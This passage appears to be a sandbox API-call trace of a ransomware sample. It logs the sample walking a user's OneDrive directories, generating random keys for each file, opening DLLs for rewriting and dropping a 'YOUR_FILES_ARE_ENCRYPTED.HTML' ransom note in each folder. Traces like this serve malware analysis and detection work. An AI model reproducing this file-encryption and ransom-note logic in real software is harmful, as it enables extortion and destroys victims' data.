ftLastAccessTime.dwLowDateTime=0x237ffd48, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x245604a7, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x9ac0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="SqmWrapper.dll", cAlternateFileName="SQMWRA~1.DLL")) returned 1 [0113.878] StrStrIW (lpFirst="SqmWrapper.dll", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.878] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\SqmWrapper.dll") returned 90 [0113.878] PathFindExtensionW (pszPath="SqmWrapper.dll") returned=".dll" [0113.878] lstrlenW (lpString=".dll") returned 4 [0113.878] PathFindExtensionW (pszPath="SqmWrapper.dll") returned=".dll" [0113.878] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0113.879] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\SqmWrapper.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\sqmwrapper.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x334 [0113.886] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=39616) returned 1 [0113.886] GetProcessHeap () returned 0x600000 [0113.886] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30f2fc0 [0113.886] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="EB") returned 2 [0113.896] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="A9") returned 2 [0113.896] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="5E") returned 2 [0113.896] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="8E") returned 2 [0113.896] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="86") returned 2 [0113.896] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="A4") returned 2 [0113.896] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="0C") returned 2 [0113.896] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="26") returned 2 [0113.896] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="A2") returned 2 [0113.896] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="55") returned 2 [0113.896] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="6D") returned 2 [0113.896] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="2A") returned 2 [0113.896] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="0B") returned 2 [0113.896] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="6C") returned 2 [0113.896] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="C8") returned 2 [0113.896] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="12") returned 2 [0113.896] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="58") returned 2 [0113.896] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="79") returned 2 [0113.896] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="13") returned 2 [0113.896] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="46") returned 2 [0113.896] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="FB") returned 2 [0113.896] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="8C") returned 2 [0113.896] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="D6") returned 2 [0113.896] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="4B") returned 2 [0113.896] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="DE") returned 2 [0113.896] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="E4") returned 2 [0113.896] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="2F") returned 2 [0113.896] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="4D") returned 2 [0113.896] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="BE") returned 2 [0113.896] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="4F") returned 2 [0113.896] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="B1") returned 2 [0113.896] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="18") returned 2 [0113.897] lstrcpyW (in: lpString1=0x3103074, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\SqmWrapper.dll" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\SqmWrapper.dll") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\SqmWrapper.dll" [0113.897] CreateIoCompletionPort (FileHandle=0x334, ExistingCompletionPort=0x274, CompletionKey=0x30f2fc0, NumberOfConcurrentThreads=0x0) returned 0x274 [0113.897] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30f2fc0, lpOverlapped=0x30f2fc0) returned 1 [0113.899] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2c0c3433, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2c0c3433, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2c0c3433, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="sr-cyrl-ba", cAlternateFileName="SR-CYR~1")) returned 1 [0113.899] StrStrIW (lpFirst="sr-cyrl-ba", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.899] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sr-cyrl-ba") returned 86 [0113.899] GetProcessHeap () returned 0x600000 [0113.899] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30a0048 [0113.912] lstrcpyW (in: lpString1=0x30a0048, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sr-cyrl-ba" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sr-cyrl-ba") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sr-cyrl-ba" [0113.912] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sr-cyrl-ba", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sr-cyrl-ba\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sr-cyrl-ba\\*" [0113.912] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sr-cyrl-ba\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2c0c3433, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2c0c3433, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2c561bfa, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x293ead4, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0113.912] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2c0c3433, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2c0c3433, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2c561bfa, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x293ead4, cFileName="..", cAlternateFileName="")) returned 1 [0113.913] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2c561bfa, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2c561bfa, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2cbca209, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x164c0, dwReserved0=0x19e010, dwReserved1=0x293ead4, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.913] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.913] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sr-cyrl-ba\\FileSync.LocalizedResources.dll.mui") returned 122 [0113.913] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.913] lstrlenW (lpString=".mui") returned 4 [0113.913] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.913] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2c561bfa, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2c561bfa, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2cbca209, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x164c0, dwReserved0=0x19e010, dwReserved1=0x293ead4, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.913] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0113.913] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sr-cyrl-ba\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 116 [0113.913] GetProcessHeap () returned 0x600000 [0113.913] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0113.913] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sr-cyrl-ba\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\sr-cyrl-ba\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0113.913] WriteFile (in: hFile=0x334, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.914] CloseHandle (hObject=0x334) returned 1 [0113.914] GetProcessHeap () returned 0x600000 [0113.914] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0113.915] GetProcessHeap () returned 0x600000 [0113.915] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0113.915] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2cd6da83, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2cd6da83, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2cd6da83, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="sr-cyrl-rs", cAlternateFileName="SR-CYR~2")) returned 1 [0113.915] StrStrIW (lpFirst="sr-cyrl-rs", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.915] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sr-cyrl-rs") returned 86 [0113.915] GetProcessHeap () returned 0x600000 [0113.915] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0113.915] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sr-cyrl-rs" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sr-cyrl-rs") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sr-cyrl-rs" [0113.915] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sr-cyrl-rs", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sr-cyrl-rs\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sr-cyrl-rs\\*" [0113.915] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sr-cyrl-rs\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2cd6da83, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2cd6da83, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2e00e27b, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x293ead4, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0113.915] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2cd6da83, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2cd6da83, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2e00e27b, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x293ead4, cFileName="..", cAlternateFileName="")) returned 1 [0113.915] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e00e27b, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2e00e27b, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2ed5138d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x15ec0, dwReserved0=0x19e010, dwReserved1=0x293ead4, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.916] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.916] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sr-cyrl-rs\\FileSync.LocalizedResources.dll.mui") returned 122 [0113.916] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.916] lstrlenW (lpString=".mui") returned 4 [0113.916] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.916] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e00e27b, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2e00e27b, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2ed5138d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x15ec0, dwReserved0=0x19e010, dwReserved1=0x293ead4, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.916] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0113.916] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sr-cyrl-rs\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 116 [0113.916] GetProcessHeap () returned 0x600000 [0113.916] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0113.916] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sr-cyrl-rs\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\sr-cyrl-rs\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0113.916] WriteFile (in: hFile=0x334, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.917] CloseHandle (hObject=0x334) returned 1 [0113.917] GetProcessHeap () returned 0x600000 [0113.917] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0113.917] GetProcessHeap () returned 0x600000 [0113.917] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0113.919] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2f2ae8e3, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2f2ae8e3, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2f2ae8e3, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="sr-latn-rs", cAlternateFileName="SR-LAT~1")) returned 1 [0113.919] StrStrIW (lpFirst="sr-latn-rs", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.919] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sr-latn-rs") returned 86 [0113.919] GetProcessHeap () returned 0x600000 [0113.919] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0113.920] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sr-latn-rs" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sr-latn-rs") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sr-latn-rs" [0113.920] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sr-latn-rs", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sr-latn-rs\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sr-latn-rs\\*" [0113.920] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sr-latn-rs\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2f2ae8e3, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2f2ae8e3, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x31566c2e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x293ead4, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0113.921] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2f2ae8e3, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2f2ae8e3, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x31566c2e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x293ead4, cFileName="..", cAlternateFileName="")) returned 1 [0113.921] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31566c2e, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x31566c2e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x328ec16f, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x160c0, dwReserved0=0x19e010, dwReserved1=0x293ead4, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.921] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.921] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sr-latn-rs\\FileSync.LocalizedResources.dll.mui") returned 122 [0113.921] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.921] lstrlenW (lpString=".mui") returned 4 [0113.921] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.921] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31566c2e, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x31566c2e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x328ec16f, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x160c0, dwReserved0=0x19e010, dwReserved1=0x293ead4, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.921] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0113.921] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sr-latn-rs\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 116 [0113.921] GetProcessHeap () returned 0x600000 [0113.921] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0113.922] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\sr-latn-rs\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\sr-latn-rs\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0113.922] WriteFile (in: hFile=0x334, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.923] CloseHandle (hObject=0x334) returned 1 [0113.923] GetProcessHeap () returned 0x600000 [0113.924] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0113.924] GetProcessHeap () returned 0x600000 [0113.924] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0113.924] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x32ccbe0d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x32ccbe0d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x32ccbe0d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="sv", cAlternateFileName="")) returned 1 [0113.924] StrStrIW (lpFirst="sv", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.924] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: 